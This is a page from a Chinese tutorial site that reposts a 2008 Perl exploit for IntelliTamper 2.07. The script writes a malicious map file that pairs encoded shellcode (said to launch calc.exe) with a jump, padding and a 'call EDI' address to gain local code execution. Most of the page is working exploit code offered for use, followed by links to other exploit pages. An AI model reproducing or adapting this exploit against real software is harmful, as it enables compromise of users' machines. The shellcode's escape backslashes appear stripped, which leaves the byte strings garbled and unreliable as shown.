手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)
IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)
摘要:#!/usr/bin/perl#k`sOSe-7/21/2008#/advisories/20172#Asploitforanancient...

#!/usr/bin/perl

# k`sOSe - 7/21/2008

# /advisories/20172

# A sploit for an ancient vuln. Just because i need

# to improve my skills on windows explotation.

use warnings;

use strict;

# CMD="c:windowssystem32calc.exe"

# [*] x86/alpha_mixed succeeded, final size 345

# bad char -> x89

my $shellcode =

"x54x5axdaxd0xd9x72xf4x59x49x49x49x49x49x49x49" .

"x49x49x49x49x43x43x43x43x43x43x37x51x5ax6ax41" .

"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42" .

"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b" .

"x4cx4ax48x47x34x43x30x45x50x45x50x4cx4bx51x55" .

"x47x4cx4cx4bx43x4cx43x35x44x38x45x51x4ax4fx4c" .

"x4bx50x4fx42x38x4cx4bx51x4fx51x30x43x31x4ax4b" .

"x51x59x4cx4bx46x54x4cx4bx45x51x4ax4ex46x51x49" .

"x50x4ax39x4ex4cx4cx44x49x50x44x34x43x37x49x51" .

"x49x5ax44x4dx43x31x48x42x4ax4bx4cx34x47x4bx50" .

"x54x51x34x44x44x42x55x4ax45x4cx4bx51x4fx46x44" .

"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51" .

"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31" .

"x4ax4bx4dx59x51x4cx46x44x45x54x48x43x51x4fx46" .

"x51x4cx36x43x50x51x46x43x54x4cx4bx50x46x50x30" .

"x4cx4bx47x30x44x4cx4cx4bx44x30x45x4cx4ex4dx4c" .

"x4bx42x48x44x48x4cx49x4bx48x4dx53x49x50x42x4a" .

"x46x30x45x38x4ax50x4dx5ax45x54x51x4fx45x38x4a" .

"x38x4bx4ex4cx4ax44x4ex50x57x4bx4fx4dx37x45x33" .

"x47x4ax51x4cx42x57x43x59x42x4ex43x54x42x4fx44" .

"x37x42x53x51x4cx44x33x44x39x44x33x44x34x43x55" .

"x42x4dx46x53x47x42x51x4cx43x53x43x51x42x4cx45" .

"x33x46x4ex42x45x43x48x43x55x45x50x45x5ax41x41";

print "### SITEMAP1 INTELLITAMPERn" .

"x41x41" .

"xebx20" . # jump ahead

"FOLDER##" .

"x41" x 24 .

$shellcode .

"E" x 108 .

"x59x51x3dx7e" . # ASCII friendly 'call EDI'

"AAAAn";

【IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)】相关文章:

eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

2345安全卫士怎么样

MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit

交换机遭遇DDoS攻击该如何来解决?

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit

WireLurker病毒怎么检测

精品推荐
分类导航